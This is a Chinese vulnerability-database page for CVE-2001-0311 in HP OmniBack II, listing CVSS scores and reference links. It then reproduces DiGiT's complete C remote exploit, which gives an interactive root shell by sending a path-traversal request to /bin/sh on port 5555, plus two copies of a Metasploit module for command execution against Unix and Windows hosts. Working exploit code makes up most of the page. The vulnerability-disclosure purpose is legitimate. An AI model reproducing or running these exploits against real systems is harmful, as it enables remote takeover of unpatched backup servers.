CVE-2001-0311
CVSS4.6
发布时间 :2001-06-02 00:00:00
修订时间 :2008-09-05 16:23:48
NMCOEP    

[原文]Vulnerability in OmniBackII A.03.50 in HP 11.x and earlier allows attackers to gain unauthorized access to an OmniBack client.


[CNNVD]HP OmniBackII访问获得漏洞(CNNVD-200106-051)

        HP 11.x版本及之前版本中OmniBackII A.03.50版本存在漏洞。攻击者可以获得OmniBack客户端的未授权访问。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hp:omniback_ii:a.03.50HP OmniBackII A.03.50
cpe:/o:hp:hp-ux:11HP-UX 11 family

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0311
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0311
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-051
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/6434
(UNKNOWN)  XF  omniback-unauthorized-access(6434)
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0102-142
(UNKNOWN)  HP  HPSBUX0102-142
http://archives.neohapsis.com/archives/hp/2001-q1/0023.html
(UNKNOWN)  HPBUG  PHSS_22915
http://archives.neohapsis.com/archives/hp/2001-q1/0022.html
(UNKNOWN)  HPBUG  PHSS_22914

- 漏洞信息

HP OmniBackII访问获得漏洞
中危 未知
2001-06-02 00:00:00 2006-11-14 00:00:00
本地  
        HP 11.x版本及之前版本中OmniBackII A.03.50版本存在漏洞。攻击者可以获得OmniBack客户端的未授权访问。

- 公告与补丁

        

- 漏洞信息 (1114)

HP OpenView OmniBack II Generic Remote Exploit (EDBID:1114)
multiple remote
2000-12-21 Verified
5555 DiGiT
N/A [点击下载]
/ *
 * HP OpenView OmniBack II generic remote Exploit by DiGiT - teddi@linux.is
 *
 * Omniback is a network backup system by HP, widely used.
 * took me some time to figure out how omniback communicated then it was just
 * a matter of finding a bug.
 *
 * This lovely little exploit will give you a remote "shell" of sorts, you
 * can execute any command on the system.
 *
 * As far as I can tell this thing is vuln on every Omniback I have seen.
 * I've tried HP-UX, Linux so far, with diff versions etc. It needs some change
 * to work on windows, but should very extremly easy, be creative.
 *
 * Greets, #!security.is, #!ADM#$%$#, #hax & HP systems for this proggie ;>
 *
 * - DiGiT [digit@security.is]
 *
 * I'm releasing this because it leaked and kids got their hands on it ;<
 * sorry.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/stat.h>


int sockfd;
struct hostent *host;

usage (char *progname)
  {

  printf ("\nOmniback II *: remote exploit by DiGiT - teddi@linux.is\n");
  printf ("Gives possibility to execute any command on a remote system as root!\n\n");
  printf ("Usage: %s hostname \n\n", progname);
  exit (1);

}

int
shell()
  {

   fd_set fd_stat;
   char recv[1024];
   int n,i;
   static char testcmd[256] = "/bin/uname -a ; id ;\r\n";

        fprintf(stdout, "We have remote shell&%#$&%!\n");
        fprintf(stdout, "\nType in any command and it will get executed.\nHave fun... DiGiT - teddi@linux.is\n\n\n");
        write(sockfd, testcmd, strlen(testcmd));
     
   while(1)
   {
      FD_ZERO(&fd_stat);
      FD_SET(sockfd, &fd_stat);
      FD_SET(0, &fd_stat);
      select(sockfd+1, &fd_stat, NULL, NULL, NULL);
      if (FD_ISSET(sockfd, &fd_stat))
       {
         if((n=read (sockfd,recv,sizeof(recv))) < 0)
           {
              printf("Connection has been closed\n");
              exit(0);
           }
           for(i = 0; i < n ; i++) {
         if(recv[i] == '\000') {
      recv[i] = "";
    }
           }
             recv[n] = 0;
       recv[n-1] = '\n';
             fprintf(stdout, "%s\n", recv);
        }
      if (FD_ISSET(0, &fd_stat))
       {
         if((n=read(0, recv, sizeof(recv)))>0)
           {
            if(write(sockfd, recv,n) == -1)
                {
                 printf("Error %$#\n");
                 exit(0);
               }
           }
       }
   }
}


send_code ()
  {

  char path[32];

 /* I dont care I just made test code and it worked, so #$%$# off */
 write (sockfd, "\000\000\000.", 4);
 write(sockfd, "2", 1);
 write(sockfd, "\000", 1);
 write(sockfd, " a", 2);
 write(sockfd, "\000", 1);
 write(sockfd, " 0", 2);
 write(sockfd, "\000", 1);
 write(sockfd, " 0", 2);
 write(sockfd, "\000", 1);
 write(sockfd, " 0", 2);
 write(sockfd, "\000", 1);
 write(sockfd, " A", 2);
 write(sockfd, "\000", 1);
 write(sockfd, " 28", 3);
 write(sockfd, "\000", 1);
 snprintf(path, sizeof(path), "/../../../bin/sh");
 write(sockfd, path, strlen(path));
 write(sockfd, "\000", 1);
 write(sockfd, "\000", 1);
 write(sockfd, "digit ", 6);
 write(sockfd, "AAAA\n", 6); // nada..

 shell(); // and the lord said, let there be shell.
 exit(0);
 
}

create_socket (char *hostname)
  {

  struct sockaddr_in s;
  int ipaddr;

  if ((host = gethostbyname (hostname)) == NULL)
  {
    herror ("gethostbyname");
    exit (1);
  }

  memcpy (&ipaddr, host->h_addr, host->h_length);

  memset (&s, 0, sizeof (struct sockaddr_in));
  s.sin_family = AF_INET;
  s.sin_port = htons (5555);
  s.sin_addr.s_addr = ipaddr;

  if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
    {
      perror ("socket");
      exit (1);
    }

  if ((connect (sockfd, (struct sockaddr *) &s, sizeof (s))) < 0)
    {
      perror ("connect");
      exit (1);
    }

}

int
main (char argc, char *argv[])
 {

  char hostname[256];

  if (argc < 2)
    {
      usage (argv[0]);
      return 0;
    }

    strncpy(hostname, argv[1], sizeof(hostname));
    create_socket (hostname);
    send_code();

 return 0;

} 

// milw0rm.com [2000-12-21]
		

- 漏洞信息 (16291)

HP OpenView OmniBack II Command Execution (EDBID:16291)
multiple remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: openview_omniback_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView OmniBack II Command Execution',
			'Description'    => %q{
					This module uses a vulnerability in the OpenView Omniback II
				service to execute arbitrary commands. This vulnerability was
				discovered by DiGiT and his code was used as the basis for this
				module.

				For Microsoft Windows targets, due to module limitations, use the
				"unix/cmd/generic" payload and set CMD to your command. You can only
				pass a small amount of characters (4) to the command line on Windows.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2001-0311'],
					['OSVDB', '6018'],
					['BID', '11032'],
					['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Unix', { }],
					[ 'Windows', { }],
				],
			'DisclosureDate' => 'Feb 28 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5555)
			], self.class)
	end

	def check

		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put("echo /etc/*;\n")
			res = sock.get_once(-1, 5)
			disconnect

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /passwd|group|resolv/)
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end

		if (target.name =~ /Windows/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-e\x20system(dir)\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			res = sock.get_once(-1, 5)
			disconnect

			print_status(res.to_s)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /V.o.l.u.m.e/) #Unicode
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put(payload.encoded + ";\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end

		if (target.name =~ /Windows/)

			# patrickw
			#
			# Tested during pen test against Windows 2003 server.
			# Windows Service details:
			# - Data Protector Inet
			# -> [HP OpenView Storage Data Protector] - Backup client service
			# -> "C:\Program Files\OmniBack\bin\omniinet.exe"
			# -> OmniInet service for Windows NT
			# -> File version: 6.0.0.0
			#
			# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
			#
			# Notes:
			# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
			# Perhaps a difference in Windows/Unix code? Logs:
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: ..\foo.exe
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-esystem(#{payload.encoded})\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			#sock.put(payload.encoded + "\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end
	end
end
		

- 漏洞信息 (F82266)

HP OpenView OmniBack II Command Execution (PacketStormID:F82266)
2009-10-27 00:00:00
H D Moore,patrick  metasploit.com
exploit,arbitrary
CVE-2001-0311
[点击下载]

This Metasploit module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'HP OpenView OmniBack II Command Execution',
			'Description'    => %q{
        		This module uses a vulnerability in the OpenView Omniback II
        		service to execute arbitrary commands. This vulnerability was
        		discovered by DiGiT and his code was used as the basis for this
        		module.
			
			For Microsoft Windows targets, due to module limitations, use the
			"unix/cmd/generic" payload and set CMD to your command. You can only
			pass a small amount of characters (4) to the command line on Windows.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2001-0311'],
					['OSVDB', '6018'],
					['BID', '11032'],
					['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        => 
				[
					[ 'Unix', { }],
					[ 'Windows', { }],
				],
			'DisclosureDate' => 'Feb 28 2001',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(5555)
				], self.class)			
	end

	def check

		if (target.name =~ /Unix/)
			connect

			poof = 
			  "\x00\x00\x00.2"+
			  "\x00 a"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 A"+
			  "\x00 28"+
			  "\x00/../../../bin/sh"+
			  "\x00\x00"+
			  "digit "+
			  "AAAA\n\x00"

			sock.put(poof)
			sock.put("echo /etc/*;\n")
			res = sock.get_once(-1, 5)
			disconnect

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /passwd|group|resolv/)
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end

		if (target.name =~ /Windows/)
			connect

			poof = 
			  "\x00\x00\x00.2"+
			  "\x00 a"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 A"+
			  "\x00 28"+
			  "\x00\\perl.exe"+
			  "\x00\x20-e\x20system(dir)\x00\x00"+
			  "digit "+
			  "AAAA\n\x00"

			sock.put(poof)
			res = sock.get_once(-1, 5)
			disconnect

			print_status(res.to_s)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /V.o.l.u.m.e/) #Unicode
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		if (target.name =~ /Unix/)
			connect

			poof = 
			  "\x00\x00\x00.2"+
			  "\x00 a"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 A"+
			  "\x00 28"+
			  "\x00/../../../bin/sh"+
			  "\x00\x00"+
			  "digit "+
			  "AAAA\n\x00"

			sock.put(poof)
			sock.put(payload.encoded + ";\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end

		if (target.name =~ /Windows/)

			# patrickw
			#
			# Tested during pen test against Windows 2003 server.
			# Windows Service details:
			# - Data Protector Inet
			# -> [HP OpenView Storage Data Protector] - Backup client service
			# -> "C:\Program Files\OmniBack\bin\omniinet.exe"
			# -> OmniInet service for Windows NT
			# -> File version: 6.0.0.0
			#
			# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
			#
			# Notes:
			# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
			# Perhaps a difference in Windows/Unix code? Logs:
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: ..\foo.exe
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

			connect

			poof = 
			  "\x00\x00\x00.2"+
			  "\x00 a"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 0"+
			  "\x00 A"+
			  "\x00 28"+
			  "\x00\\perl.exe"+
			  "\x00\x20-esystem(#{payload.encoded})\x00\x00"+
			  "digit "+
			  "AAAA\n\x00"

			sock.put(poof)
			#sock.put(payload.encoded + "\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end
	end
end

    

- 漏洞信息

6018
HP OpenView OmniBack Unauthorized ImniBack Client Access
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

HP OpenView OmniBack contains a flaw that may allow a remote attacker to gain unauthorized access. The issue is triggered due to an unspecified flaw in the OmniBack client, which may allow a remote attacker to gain administrative access to the system and execute arbitrary commands resulting in a loss of confidentiality and/or integrity.

- 时间线

2001-02-28 Unknow
2000-12-21 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Hewlett-Packard has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站